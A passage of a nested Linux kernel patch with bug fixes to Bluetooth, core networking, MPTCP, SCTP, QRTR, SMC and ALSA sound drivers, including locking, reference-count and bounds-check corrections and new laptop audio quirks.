+index cc20e706c6391..82cc15ad963d8 100644
+--- a/net/bluetooth/hidp/core.c
++++ b/net/bluetooth/hidp/core.c
+@@ -433,7 +433,7 @@ static void hidp_set_timer(struct hidp_session *session)
+ static void hidp_del_timer(struct hidp_session *session)
+ {
+ 	if (session->idle_to > 0)
+-		del_timer(&session->timer);
++		del_timer_sync(&session->timer);
+ }
+ 
+ static void hidp_process_report(struct hidp_session *session, int type,
+diff --git a/net/bluetooth/l2cap_core.c b/net/bluetooth/l2cap_core.c
+index 49926f59cc123..55a7226233f96 100644
+--- a/net/bluetooth/l2cap_core.c
++++ b/net/bluetooth/l2cap_core.c
+@@ -4652,33 +4652,27 @@ static inline int l2cap_disconnect_req(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("scid 0x%4.4x dcid 0x%4.4x", scid, dcid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, dcid);
++	chan = l2cap_get_chan_by_scid(conn, dcid);
+ 	if (!chan) {
+-		mutex_unlock(&conn->chan_lock);
+ 		cmd_reject_invalid_cid(conn, cmd->ident, dcid, scid);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	rsp.dcid = cpu_to_le16(chan->scid);
+ 	rsp.scid = cpu_to_le16(chan->dcid);
+ 	l2cap_send_cmd(conn, cmd->ident, L2CAP_DISCONN_RSP, sizeof(rsp), &rsp);
+ 
+ 	chan->ops->set_shutdown(chan);
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, ECONNRESET);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+@@ -4698,33 +4692,27 @@ static inline int l2cap_disconnect_rsp(struct l2cap_conn *conn,
+ 
+ 	BT_DBG("dcid 0x%4.4x scid 0x%4.4x", dcid, scid);
+ 
+-	mutex_lock(&conn->chan_lock);
+-
+-	chan = __l2cap_get_chan_by_scid(conn, scid);
++	chan = l2cap_get_chan_by_scid(conn, scid);
+ 	if (!chan) {
+ 		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
+-	l2cap_chan_hold(chan);
+-	l2cap_chan_lock(chan);
+-
+ 	if (chan->state != BT_DISCONN) {
+ 		l2cap_chan_unlock(chan);
+ 		l2cap_chan_put(chan);
+-		mutex_unlock(&conn->chan_lock);
+ 		return 0;
+ 	}
+ 
++	mutex_lock(&conn->chan_lock);
+ 	l2cap_chan_del(chan, 0);
++	mutex_unlock(&conn->chan_lock);
+ 
+ 	chan->ops->close(chan);
+ 
+ 	l2cap_chan_unlock(chan);
+ 	l2cap_chan_put(chan);
+ 
+-	mutex_unlock(&conn->chan_lock);
+-
+ 	return 0;
+ }
+ 
+diff --git a/net/bluetooth/sco.c b/net/bluetooth/sco.c
+index 1111da4e2f2bd..1755f91a66f6a 100644
+--- a/net/bluetooth/sco.c
++++ b/net/bluetooth/sco.c
+@@ -1129,6 +1129,8 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			break;
+ 		}
+ 
++		release_sock(sk);
++
+ 		/* find total buffer size required to copy codec + caps */
+ 		hci_dev_lock(hdev);
+ 		list_for_each_entry(c, &hdev->local_codecs, list) {
+@@ -1146,15 +1148,13 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 		buf_len += sizeof(struct bt_codecs);
+ 		if (buf_len > len) {
+ 			hci_dev_put(hdev);
+-			err = -ENOBUFS;
+-			break;
++			return -ENOBUFS;
+ 		}
+ 		ptr = optval;
+ 
+ 		if (put_user(num_codecs, ptr)) {
+ 			hci_dev_put(hdev);
+-			err = -EFAULT;
+-			break;
++			return -EFAULT;
+ 		}
+ 		ptr += sizeof(num_codecs);
+ 
+@@ -1194,12 +1194,14 @@ static int sco_sock_getsockopt(struct socket *sock, int level, int optname,
+ 			ptr += len;
+ 		}
+ 
+-		if (!err && put_user(buf_len, optlen))
+-			err = -EFAULT;
+-
+ 		hci_dev_unlock(hdev);
+ 		hci_dev_put(hdev);
+ 
++		lock_sock(sk);
++
++		if (!err && put_user(buf_len, optlen))
++			err = -EFAULT;
++
+ 		break;
+ 
+ 	default:
+diff --git a/net/core/dev.c b/net/core/dev.c
+index fce980d531bdc..404125e7a57a5 100644
+--- a/net/core/dev.c
++++ b/net/core/dev.c
+@@ -3196,6 +3196,7 @@ static u16 skb_tx_hash(const struct net_device *dev,
+ 	}
+ 
+ 	if (skb_rx_queue_recorded(skb)) {
++		DEBUG_NET_WARN_ON_ONCE(qcount == 0);
+ 		hash = skb_get_rx_queue(skb);
+ 		if (hash >= qoffset)
+ 			hash -= qoffset;
+@@ -10836,7 +10837,7 @@ void unregister_netdevice_many_notify(struct list_head *head,
+ 		    dev->rtnl_link_state == RTNL_LINK_INITIALIZED)
+ 			skb = rtmsg_ifinfo_build_skb(RTM_DELLINK, dev, ~0U, 0,
+ 						     GFP_KERNEL, NULL, 0,
+-						     portid, nlmsg_seq(nlh));
++						     portid, nlh);
+ 
+ 		/*
+ 		 *	Flush the unicast and multicast chains
+diff --git a/net/core/rtnetlink.c b/net/core/rtnetlink.c
+index 64289bc988878..f5114b2395ae3 100644
+--- a/net/core/rtnetlink.c
++++ b/net/core/rtnetlink.c
+@@ -3939,16 +3939,23 @@ static int rtnl_dump_all(struct sk_buff *skb, struct netlink_callback *cb)
+ struct sk_buff *rtmsg_ifinfo_build_skb(int type, struct net_device *dev,
+ 				       unsigned int change,
+ 				       u32 event, gfp_t flags, int *new_nsid,
+-				       int new_ifindex, u32 portid, u32 seq)
++				       int new_ifindex, u32 portid,
++				       const struct nlmsghdr *nlh)
+ {
+ 	struct net *net = dev_net(dev);
+ 	struct sk_buff *skb;
+ 	int err = -ENOBUFS;
++	u32 seq = 0;
+ 
+ 	skb = nlmsg_new(if_nlmsg_size(dev, 0), flags);
+ 	if (skb == NULL)
+ 		goto errout;
+ 
++	if (nlmsg_report(nlh))
++		seq = nlmsg_seq(nlh);
++	else
++		portid = 0;
++
+ 	err = rtnl_fill_ifinfo(skb, dev, dev_net(dev),
+ 			       type, portid, seq, change, 0, 0, event,
+ 			       new_nsid, new_ifindex, -1, flags);
+@@ -3984,7 +3991,7 @@ static void rtmsg_ifinfo_event(int type, struct net_device *dev,
+ 		return;
+ 
+ 	skb = rtmsg_ifinfo_build_skb(type, dev, change, event, flags, new_nsid,
+-				     new_ifindex, portid, nlmsg_seq(nlh));
++				     new_ifindex, portid, nlh);
+ 	if (skb)
+ 		rtmsg_ifinfo_send(skb, dev, flags, portid, nlh);
+ }
+diff --git a/net/core/skbuff.c b/net/core/skbuff.c
+index a31ff4d83ecc4..43e1b89695c22 100644
+--- a/net/core/skbuff.c
++++ b/net/core/skbuff.c
+@@ -5475,18 +5475,18 @@ bool skb_try_coalesce(struct sk_buff *to, struct sk_buff *from,
+ 	if (skb_cloned(to))
+ 		return false;
+ 
+-	/* In general, avoid mixing slab allocated and page_pool allocated
+-	 * pages within the same SKB. However when @to is not pp_recycle and
+-	 * @from is cloned, we can transition frag pages from page_pool to
+-	 * reference counted.
+-	 *
+-	 * On the other hand, don't allow coalescing two pp_recycle SKBs if
+-	 * @from is cloned, in case the SKB is using page_pool fragment
++	/* In general, avoid mixing page_pool and non-page_pool allocated
++	 * pages within the same SKB. Additionally avoid dealing with clones
++	 * with page_pool pages, in case the SKB is using page_pool fragment
+ 	 * references (PP_FLAG_PAGE_FRAG). Since we only take full page
+ 	 * references for cloned SKBs at the moment that would result in
+ 	 * inconsistent reference counts.
++	 * In theory we could take full references if @from is cloned and
++	 * !@to->pp_recycle but its tricky (due to potential race with
++	 * the clone disappearing) and rare, so not worth dealing with.
+ 	 */
+-	if (to->pp_recycle != (from->pp_recycle && !skb_cloned(from)))
++	if (to->pp_recycle != from->pp_recycle ||
++	    (from->pp_recycle && skb_cloned(from)))
+ 		return false;
+ 
+ 	if (len <= skb_tailroom(to)) {
+diff --git a/net/ipv4/sysctl_net_ipv4.c b/net/ipv4/sysctl_net_ipv4.c
+index 0d0cc4ef2b85a..40fe70fc2015d 100644
+--- a/net/ipv4/sysctl_net_ipv4.c
++++ b/net/ipv4/sysctl_net_ipv4.c
+@@ -25,6 +25,7 @@ static int ip_local_port_range_min[] = { 1, 1 };
+ static int ip_local_port_range_max[] = { 65535, 65535 };
+ static int tcp_adv_win_scale_min = -31;
+ static int tcp_adv_win_scale_max = 31;
++static int tcp_app_win_max = 31;
+ static int tcp_min_snd_mss_min = TCP_MIN_SND_MSS;
+ static int tcp_min_snd_mss_max = 65535;
+ static int ip_privileged_port_min;
+@@ -1198,6 +1199,8 @@ static struct ctl_table ipv4_net_table[] = {
+ 		.maxlen		= sizeof(u8),
+ 		.mode		= 0644,
+ 		.proc_handler	= proc_dou8vec_minmax,
++		.extra1		= SYSCTL_ZERO,
++		.extra2		= &tcp_app_win_max,
+ 	},
+ 	{
+ 		.procname	= "tcp_adv_win_scale",
+diff --git a/net/ipv4/tcp_ipv4.c b/net/ipv4/tcp_ipv4.c
+index 8320d0ecb13ae..339a9cea90473 100644
+--- a/net/ipv4/tcp_ipv4.c
++++ b/net/ipv4/tcp_ipv4.c
+@@ -2779,7 +2779,7 @@ static int tcp_prog_seq_show(struct bpf_prog *prog, struct bpf_iter_meta *meta,
+ static void bpf_iter_tcp_put_batch(struct bpf_tcp_iter_state *iter)
+ {
+ 	while (iter->cur_sk < iter->end_sk)
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ }
+ 
+ static int bpf_iter_tcp_realloc_batch(struct bpf_tcp_iter_state *iter,
+@@ -2940,7 +2940,7 @@ static void *bpf_iter_tcp_seq_next(struct seq_file *seq, void *v, loff_t *pos)
+ 		 * st->bucket.  See tcp_seek_last_pos().
+ 		 */
+ 		st->offset++;
+-		sock_put(iter->batch[iter->cur_sk++]);
++		sock_gen_put(iter->batch[iter->cur_sk++]);
+ 	}
+ 
+ 	if (iter->cur_sk < iter->end_sk)
+diff --git a/net/ipv6/udp.c b/net/ipv6/udp.c
+index 9fb2f33ee3a76..a675acfb901d1 100644
+--- a/net/ipv6/udp.c
++++ b/net/ipv6/udp.c
+@@ -1395,9 +1395,11 @@ int udpv6_sendmsg(struct sock *sk, struct msghdr *msg, size_t len)
+ 			msg->msg_name = &sin;
+ 			msg->msg_namelen = sizeof(sin);
+ do_udp_sendmsg:
+-			if (ipv6_only_sock(sk))
+-				return -ENETUNREACH;
+-			return udp_sendmsg(sk, msg, len);
++			err = ipv6_only_sock(sk) ?
++				-ENETUNREACH : udp_sendmsg(sk, msg, len);
++			msg->msg_name = sin6;
++			msg->msg_namelen = addr_len;
++			return err;
+ 		}
+ 	}
+ 
+diff --git a/net/mptcp/fastopen.c b/net/mptcp/fastopen.c
+index d237d142171c5..bceaab8dd8e46 100644
+--- a/net/mptcp/fastopen.c
++++ b/net/mptcp/fastopen.c
+@@ -9,11 +9,18 @@
+ void mptcp_fastopen_subflow_synack_set_params(struct mptcp_subflow_context *subflow,
+ 					      struct request_sock *req)
+ {
+-	struct sock *ssk = subflow->tcp_sock;
+-	struct sock *sk = subflow->conn;
++	struct sock *sk, *ssk;
+ 	struct sk_buff *skb;
+ 	struct tcp_sock *tp;
+ 
++	/* on early fallback the subflow context is deleted by
++	 * subflow_syn_recv_sock()
++	 */
++	if (!subflow)
++		return;
++
++	ssk = subflow->tcp_sock;
++	sk = subflow->conn;
+ 	tp = tcp_sk(ssk);
+ 
+ 	subflow->is_mptfo = 1;
+diff --git a/net/mptcp/options.c b/net/mptcp/options.c
+index 5ded85e2c374a..3872eadb076bc 100644
+--- a/net/mptcp/options.c
++++ b/net/mptcp/options.c
+@@ -1192,9 +1192,8 @@ bool mptcp_incoming_options(struct sock *sk, struct sk_buff *skb)
+ 	 */
+ 	if (TCP_SKB_CB(skb)->seq == TCP_SKB_CB(skb)->end_seq) {
+ 		if (mp_opt.data_fin && mp_opt.data_len == 1 &&
+-		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64) &&
+-		    schedule_work(&msk->work))
+-			sock_hold(subflow->conn);
++		    mptcp_update_rcv_data_fin(msk, mp_opt.data_seq, mp_opt.dsn64))
++			mptcp_schedule_work((struct sock *)msk);
+ 
+ 		return true;
+ 	}
+diff --git a/net/mptcp/protocol.c b/net/mptcp/protocol.c
+index 6c2577b93fd80..0fbcb8f4fd651 100644
+--- a/net/mptcp/protocol.c
++++ b/net/mptcp/protocol.c
+@@ -2627,7 +2627,7 @@ static void mptcp_worker(struct work_struct *work)
+ 
+ 	lock_sock(sk);
+ 	state = sk->sk_state;
+-	if (unlikely(state == TCP_CLOSE))
++	if (unlikely((1 << state) & (TCPF_CLOSE | TCPF_LISTEN)))
+ 		goto unlock;
+ 
+ 	mptcp_check_data_fin_ack(sk);
+diff --git a/net/mptcp/subflow.c b/net/mptcp/subflow.c
+index 8f6e48e5db2ce..dbc02c2c57ccc 100644
+--- a/net/mptcp/subflow.c
++++ b/net/mptcp/subflow.c
+@@ -407,9 +407,8 @@ void mptcp_subflow_reset(struct sock *ssk)
+ 
+ 	tcp_send_active_reset(ssk, GFP_ATOMIC);
+ 	tcp_done(ssk);
+-	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags) &&
+-	    schedule_work(&mptcp_sk(sk)->work))
+-		return; /* worker will put sk for us */
++	if (!test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &mptcp_sk(sk)->flags))
++		mptcp_schedule_work(sk);
+ 
+ 	sock_put(sk);
+ }
+@@ -1117,8 +1116,8 @@ static enum mapping_status get_mapping_status(struct sock *ssk,
+ 				skb_ext_del(skb, SKB_EXT_MPTCP);
+ 				return MAPPING_OK;
+ 			} else {
+-				if (updated && schedule_work(&msk->work))
+-					sock_hold((struct sock *)msk);
++				if (updated)
++					mptcp_schedule_work((struct sock *)msk);
+ 
+ 				return MAPPING_DATA_FIN;
+ 			}
+@@ -1221,17 +1220,12 @@ static void mptcp_subflow_discard_data(struct sock *ssk, struct sk_buff *skb,
+ /* sched mptcp worker to remove the subflow if no more data is pending */
+ static void subflow_sched_work_if_closed(struct mptcp_sock *msk, struct sock *ssk)
+ {
+-	struct sock *sk = (struct sock *)msk;
+-
+ 	if (likely(ssk->sk_state != TCP_CLOSE))
+ 		return;
+ 
+ 	if (skb_queue_empty(&ssk->sk_receive_queue) &&
+-	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags)) {
+-		sock_hold(sk);
+-		if (!schedule_work(&msk->work))
+-			sock_put(sk);
+-	}
++	    !test_and_set_bit(MPTCP_WORK_CLOSE_SUBFLOW, &msk->flags))
++		mptcp_schedule_work((struct sock *)msk);
+ }
+ 
+ static bool subflow_can_fallback(struct mptcp_subflow_context *subflow)
+diff --git a/net/openvswitch/actions.c b/net/openvswitch/actions.c
+index ca3ebfdb30231..a8cf9a88758ef 100644
+--- a/net/openvswitch/actions.c
++++ b/net/openvswitch/actions.c
+@@ -913,7 +913,7 @@ static void do_output(struct datapath *dp, struct sk_buff *skb, int out_port,
+ {
+ 	struct vport *vport = ovs_vport_rcu(dp, out_port);
+ 
+-	if (likely(vport)) {
++	if (likely(vport && netif_carrier_ok(vport->dev))) {
+ 		u16 mru = OVS_CB(skb)->mru;
+ 		u32 cutlen = OVS_CB(skb)->cutlen;
+ 
+diff --git a/net/qrtr/af_qrtr.c b/net/qrtr/af_qrtr.c
+index 3a70255c8d02f..76f0434d3d06a 100644
+--- a/net/qrtr/af_qrtr.c
++++ b/net/qrtr/af_qrtr.c
+@@ -498,6 +498,11 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 	if (!size || len != ALIGN(size, 4) + hdrlen)
+ 		goto err;
+ 
++	if ((cb->type == QRTR_TYPE_NEW_SERVER ||
++	     cb->type == QRTR_TYPE_RESUME_TX) &&
++	    size < sizeof(struct qrtr_ctrl_pkt))
++		goto err;
++
+ 	if (cb->dst_port != QRTR_PORT_CTRL && cb->type != QRTR_TYPE_DATA &&
+ 	    cb->type != QRTR_TYPE_RESUME_TX)
+ 		goto err;
+@@ -510,9 +515,6 @@ int qrtr_endpoint_post(struct qrtr_endpoint *ep, const void *data, size_t len)
+ 		/* Remote node endpoint can bridge other distant nodes */
+ 		const struct qrtr_ctrl_pkt *pkt;
+ 
+-		if (size < sizeof(*pkt))
+-			goto err;
+-
+ 		pkt = data + hdrlen;
+ 		qrtr_node_assign(node, le32_to_cpu(pkt->server.node));
+ 	}
+diff --git a/net/sctp/stream_interleave.c b/net/sctp/stream_interleave.c
+index 94727feb07b3e..b046b11200c93 100644
+--- a/net/sctp/stream_interleave.c
++++ b/net/sctp/stream_interleave.c
+@@ -1154,7 +1154,8 @@ static void sctp_generate_iftsn(struct sctp_outq *q, __u32 ctsn)
+ 
+ #define _sctp_walk_ifwdtsn(pos, chunk, end) \
+ 	for (pos = chunk->subh.ifwdtsn_hdr->skip; \
+-	     (void *)pos < (void *)chunk->subh.ifwdtsn_hdr->skip + (end); pos++)
++	     (void *)pos <= (void *)chunk->subh.ifwdtsn_hdr->skip + (end) - \
++			    sizeof(struct sctp_ifwdtsn_skip); pos++)
+ 
+ #define sctp_walk_ifwdtsn(pos, ch) \
+ 	_sctp_walk_ifwdtsn((pos), (ch), ntohs((ch)->chunk_hdr->length) - \
+diff --git a/net/smc/af_smc.c b/net/smc/af_smc.c
+index e8018b0fb7676..bdeaee727538d 100644
+--- a/net/smc/af_smc.c
++++ b/net/smc/af_smc.c
+@@ -3257,6 +3257,17 @@ static int __smc_create(struct net *net, struct socket *sock, int protocol,
+ 			sk_common_release(sk);
+ 			goto out;
+ 		}
++
++		/* smc_clcsock_release() does not wait smc->clcsock->sk's
++		 * destruction;  its sk_state might not be TCP_CLOSE after
++		 * smc->sk is close()d, and TCP timers can be fired later,
++		 * which need net ref.
++		 */
++		sk = smc->clcsock->sk;
++		__netns_tracker_free(net, &sk->ns_tracker, false);
++		sk->sk_net_refcnt = 1;
++		get_net_track(net, &sk->ns_tracker, GFP_KERNEL);
++		sock_inuse_add(net, 1);
+ 	} else {
+ 		smc->clcsock = clcsock;
+ 	}
+diff --git a/sound/firewire/tascam/tascam-stream.c b/sound/firewire/tascam/tascam-stream.c
+index 53e094cc411f8..dfe783d01d7d2 100644
+--- a/sound/firewire/tascam/tascam-stream.c
++++ b/sound/firewire/tascam/tascam-stream.c
+@@ -490,7 +490,7 @@ int snd_tscm_stream_start_duplex(struct snd_tscm *tscm, unsigned int rate)
+ 		// packet is important for media clock recovery.
+ 		err = amdtp_domain_start(&tscm->domain, tx_init_skip_cycles, true, true);
+ 		if (err < 0)
+-			return err;
++			goto error;
+ 
+ 		if (!amdtp_domain_wait_ready(&tscm->domain, READY_TIMEOUT_MS)) {
+ 			err = -ETIMEDOUT;
+diff --git a/sound/i2c/cs8427.c b/sound/i2c/cs8427.c
+index 65012af6a36e4..f58b14b490455 100644
+--- a/sound/i2c/cs8427.c
++++ b/sound/i2c/cs8427.c
+@@ -561,10 +561,13 @@ int snd_cs8427_iec958_active(struct snd_i2c_device *cs8427, int active)
+ 	if (snd_BUG_ON(!cs8427))
+ 		return -ENXIO;
+ 	chip = cs8427->private_data;
+-	if (active)
++	if (active) {
+ 		memcpy(chip->playback.pcm_status,
+ 		       chip->playback.def_status, 24);
+-	chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++		chip->playback.pcm_ctl->vd[0].access &= ~SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	} else {
++		chip->playback.pcm_ctl->vd[0].access |= SNDRV_CTL_ELEM_ACCESS_INACTIVE;
++	}
+ 	snd_ctl_notify(cs8427->bus->card,
+ 		       SNDRV_CTL_EVENT_MASK_VALUE | SNDRV_CTL_EVENT_MASK_INFO,
+ 		       &chip->playback.pcm_ctl->id);
+diff --git a/sound/pci/emu10k1/emupcm.c b/sound/pci/emu10k1/emupcm.c
+index 48af77ae8020f..6ec394fb18468 100644
+--- a/sound/pci/emu10k1/emupcm.c
++++ b/sound/pci/emu10k1/emupcm.c
+@@ -1236,7 +1236,7 @@ static int snd_emu10k1_capture_mic_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_mic_interrupt = NULL;
+ 	emu->pcm_capture_mic_substream = NULL;
+ 	return 0;
+ }
+@@ -1344,7 +1344,7 @@ static int snd_emu10k1_capture_efx_close(struct snd_pcm_substream *substream)
+ {
+ 	struct snd_emu10k1 *emu = snd_pcm_substream_chip(substream);
+ 
+-	emu->capture_interrupt = NULL;
++	emu->capture_efx_interrupt = NULL;
+ 	emu->pcm_capture_efx_substream = NULL;
+ 	return 0;
+ }
+@@ -1781,17 +1781,21 @@ int snd_emu10k1_pcm_efx(struct snd_emu10k1 *emu, int device)
+ 	struct snd_kcontrol *kctl;
+ 	int err;
+ 
+-	err = snd_pcm_new(emu->card, "emu10k1 efx", device, 8, 1, &pcm);
++	err = snd_pcm_new(emu->card, "emu10k1 efx", device, emu->audigy ? 0 : 8, 1, &pcm);
+ 	if (err < 0)
+ 		return err;
+ 
+ 	pcm->private_data = emu;
+ 
+-	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
++	if (!emu->audigy)
++		snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_PLAYBACK, &snd_emu10k1_fx8010_playback_ops);
+ 	snd_pcm_set_ops(pcm, SNDRV_PCM_STREAM_CAPTURE, &snd_emu10k1_capture_efx_ops);
+ 
+ 	pcm->info_flags = 0;
+-	strcpy(pcm->name, "Multichannel Capture/PT Playback");
++	if (emu->audigy)
++		strcpy(pcm->name, "Multichannel Capture");
++	else
++		strcpy(pcm->name, "Multichannel Capture/PT Playback");
+ 	emu->pcm_efx = pcm;
+ 
+ 	/* EFX capture - record the "FXBUS2" channels, by default we connect the EXTINs 
+diff --git a/sound/pci/hda/patch_hdmi.c b/sound/pci/hda/patch_hdmi.c
+index 4ffa3a59f419f..5c6980394dcec 100644
+--- a/sound/pci/hda/patch_hdmi.c
++++ b/sound/pci/hda/patch_hdmi.c
+@@ -4604,7 +4604,7 @@ HDA_CODEC_ENTRY(0x80862814, "DG1 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862815, "Alderlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862816, "Rocketlake HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x80862818, "Raptorlake HDMI",	patch_i915_tgl_hdmi),
+-HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_adlp_hdmi),
++HDA_CODEC_ENTRY(0x80862819, "DG2 HDMI",	patch_i915_tgl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281a, "Jasperlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281b, "Elkhartlake HDMI",	patch_i915_icl_hdmi),
+ HDA_CODEC_ENTRY(0x8086281c, "Alderlake-P HDMI", patch_i915_adlp_hdmi),
+diff --git a/sound/pci/hda/patch_realtek.c b/sound/pci/hda/patch_realtek.c
+index 50b8573b52066..6a6c72b5ea26d 100644
+--- a/sound/pci/hda/patch_realtek.c
++++ b/sound/pci/hda/patch_realtek.c
+@@ -6960,6 +6960,8 @@ enum {
+ 	ALC269_FIXUP_DELL_M101Z,
+ 	ALC269_FIXUP_SKU_IGNORE,
+ 	ALC269_FIXUP_ASUS_G73JW,
++	ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	ALC269_FIXUP_ASUS_N7601ZM,
+ 	ALC269_FIXUP_LENOVO_EAPD,
+ 	ALC275_FIXUP_SONY_HWEQ,
+ 	ALC275_FIXUP_SONY_DISABLE_AAMIX,
+@@ -7256,6 +7258,29 @@ static const struct hda_fixup alc269_fixups[] = {
+ 			{ }
+ 		}
+ 	},
++	[ALC269_FIXUP_ASUS_N7601ZM_PINS] = {
++		.type = HDA_FIXUP_PINS,
++		.v.pins = (const struct hda_pintbl[]) {
++			{ 0x19, 0x03A11050 },
++			{ 0x1a, 0x03A11C30 },
++			{ 0x21, 0x03211420 },
++			{ }
++		}
++	},
++	[ALC269_FIXUP_ASUS_N7601ZM] = {
++		.type = HDA_FIXUP_VERBS,
++		.v.verbs = (const struct hda_verb[]) {
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x62},
++			{0x20, AC_VERB_SET_PROC_COEF, 0xa007},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x10},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x8420},
++			{0x20, AC_VERB_SET_COEF_INDEX, 0x0f},
++			{0x20, AC_VERB_SET_PROC_COEF, 0x7774},
++			{ }
++		},
++		.chained = true,
++		.chain_id = ALC269_FIXUP_ASUS_N7601ZM_PINS,
++	},
+ 	[ALC269_FIXUP_LENOVO_EAPD] = {
+ 		.type = HDA_FIXUP_VERBS,
+ 		.v.verbs = (const struct hda_verb[]) {
+@@ -9465,6 +9490,7 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x1043, 0x1271, "ASUS X430UN", ALC256_FIXUP_ASUS_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x1290, "ASUS X441SA", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
+ 	SND_PCI_QUIRK(0x1043, 0x12a0, "ASUS X441UV", ALC233_FIXUP_EAPD_COEF_AND_MIC_NO_PRESENCE),
++	SND_PCI_QUIRK(0x1043, 0x12a3, "Asus N7691ZM", ALC269_FIXUP_ASUS_N7601ZM),
+ 	SND_PCI_QUIRK(0x1043, 0x12af, "ASUS UX582ZS", ALC245_FIXUP_CS35L41_SPI_2),
+ 	SND_PCI_QUIRK(0x1043, 0x12e0, "ASUS X541SA", ALC256_FIXUP_ASUS_MIC),
+ 	SND_PCI_QUIRK(0x1043, 0x12f0, "ASUS X541UV", ALC256_FIXUP_ASUS_MIC),
+@@ -9662,6 +9688,9 @@ static const struct snd_pci_quirk alc269_fixup_tbl[] = {
+ 	SND_PCI_QUIRK(0x17aa, 0x22f1, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f2, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x22f3, "Thinkpad", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2318, "Thinkpad Z13 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x2319, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
++	SND_PCI_QUIRK(0x17aa, 0x231a, "Thinkpad Z16 Gen2", ALC287_FIXUP_CS35L41_I2C_2),
+ 	SND_PCI_QUIRK(0x17aa, 0x30bb, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x30e2, "ThinkCentre AIO", ALC233_FIXUP_LENOVO_LINE2_MIC_HOTKEY),
+ 	SND_PCI_QUIRK(0x17aa, 0x310c, "ThinkCentre Station", ALC294_FIXUP_LENOVO_MIC_LOCATION),
+diff --git a/sound/pci/hda/patch_sigmatel.c b/sound/pci/hda/patch_sigmatel.c
+index a794a01a68ca6..61258b0aac8d6 100644
+--- a/sound/pci/hda/patch_sigmatel.c
++++ b/sound/pci/hda/patch_sigmatel.c
+@@ -1707,6 +1707,7 @@ static const struct snd_pci_quirk stac925x_fixup_tbl[] = {
+ };
+ 
+ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
++	// Port A-H
+ 	{ 0x0a, 0x02214030 },
+ 	{ 0x0b, 0x02a19040 },
+ 	{ 0x0c, 0x01a19020 },
+@@ -1715,9 +1716,12 @@ static const struct hda_pintbl ref92hd73xx_pin_configs[] = {
+ 	{ 0x0f, 0x01014010 },
+ 	{ 0x10, 0x01014020 },
+ 	{ 0x11, 0x01014030 },
++	// CD in
+ 	{ 0x12, 0x02319040 },
++	// Digial Mic ins
+ 	{ 0x13, 0x90a000f0 },
+ 	{ 0x14, 0x90a000f0 },
++	// Digital outs
+ 	{ 0x22, 0x01452050 },
+ 	{ 0x23, 0x01452050 },
+ 	{}
+@@ -1758,6 +1762,7 @@ static const struct hda_pintbl alienware_m17x_pin_configs[] = {
+ };
+ 
+ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
++	// Analog outputs
+ 	{ 0x0a, 0x02214230 },
+ 	{ 0x0b, 0x02A19240 },
+ 	{ 0x0c, 0x01013214 },
+@@ -1765,6 +1770,9 @@ static const struct hda_pintbl intel_dg45id_pin_configs[] = {
+ 	{ 0x0e, 0x01A19250 },
+ 	{ 0x0f, 0x01011212 },
+ 	{ 0x10, 0x01016211 },
++	// Digital output
++	{ 0x22, 0x01451380 },
++	{ 0x23, 0x40f000f0 },
+ 	{}
+ };
+ 
+@@ -1955,6 +1963,8 @@ static const struct snd_pci_quirk stac92hd73xx_fixup_tbl[] = {
+ 				"DFI LanParty", STAC_92HD73XX_REF),
+ 	SND_PCI_QUIRK(PCI_VENDOR_ID_DFI, 0x3101,
